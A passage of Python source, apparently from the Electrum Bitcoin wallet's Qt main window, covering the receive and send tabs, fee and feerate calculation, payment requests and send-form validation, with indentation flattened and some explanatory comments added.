fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
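# The two wrappers above implement a "remember the last-used directory" pattern:
# seed the dialog with the stored 'io_dir' value, and persist the new directory
# only when the chosen file lives somewhere else. Stripped of Qt and Electrum
# specifics, the idea is roughly the following (illustrative sketch only;
# `load_dir` and `save_dir` are hypothetical callables):
#
#   def remember_dir(chosen_path, load_dir, save_dir):
#       if chosen_path and os.path.dirname(chosen_path) != load_dir():
#           save_dir(os.path.dirname(chosen_path))
#       return chosen_path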
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
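# connect_fields keeps the BTC and fiat amount edits in sync with two
# conversions: satoshis = fiat / rate * COIN when the fiat field is edited, and
# fiat = satoshis * rate / COIN in the other direction. A worked example with
# made-up numbers (illustrative only):
#
#   rate = Decimal('20000')           # fiat units per BTC
#   fiat = Decimal('50')              # user types 50 into the fiat field
#   sats = int(fiat / rate * COIN)    # -> 250000 satoshis (0.0025 BTC)
#   back = sats * rate / COIN         # -> Decimal('50') again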
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = QIcon(":icons/status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = QIcon(":icons/status_connected%s.png"%fork_str)
else:
icon = QIcon(":icons/status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin address where the payment should be received. Note that each payment request uses a different Bitcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
traceback.print_exc(file=sys.stderr)
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
try:
addr = self.wallet.get_receiving_address() or ''
except InternalAddressCorruption as e:
self.show_error(str(e))
addr = ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(140)
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
QMessageBox.information(self, 'Fee rounding', text)
self.feerounding_icon = QPushButton(QIcon(':icons/info.png'), '')
self.feerounding_icon.setFixedWidth(20)
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.is_max = False
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
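# Color the amount/fee/feerate fields: red when funds are insufficient, blue for
# values filled in automatically, default color for user-entered values.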
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee_estimator = self.get_send_fee_estimator()
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
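# Build a throwaway unsigned transaction just to learn its size and fee, and to
# find out whether the selected coins can cover the requested amount.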
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
self.get_coins(), outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
traceback.print_exc(file=sys.stderr)
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.is_max:
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
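# Returns what make_unsigned_transaction expects as fixed_fee: an int (satoshis)
# if the absolute fee is frozen, a callable fee estimator if the fee rate is
# frozen, or None to fall back to dynamic fee estimation.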
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
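# Validate the send form. Returns (outputs, fee_estimator, label, coins) on
# success, or None if validation fails (an error dialog is shown in that case).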
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for o in outputs:
if o.address is None:
self.show_error(_('Bitcoin Address is None'))
return
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Bitcoin Address'))
return
if o.value is None:
self.show_error(_('Invalid Amount'))
return
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee_estimator, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
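# Reject fees below the server's minimum relay fee rate: relayfee() is in
# sat/kvB and estimated_size() in bytes, so dividing by 1000 gives the floor.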
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
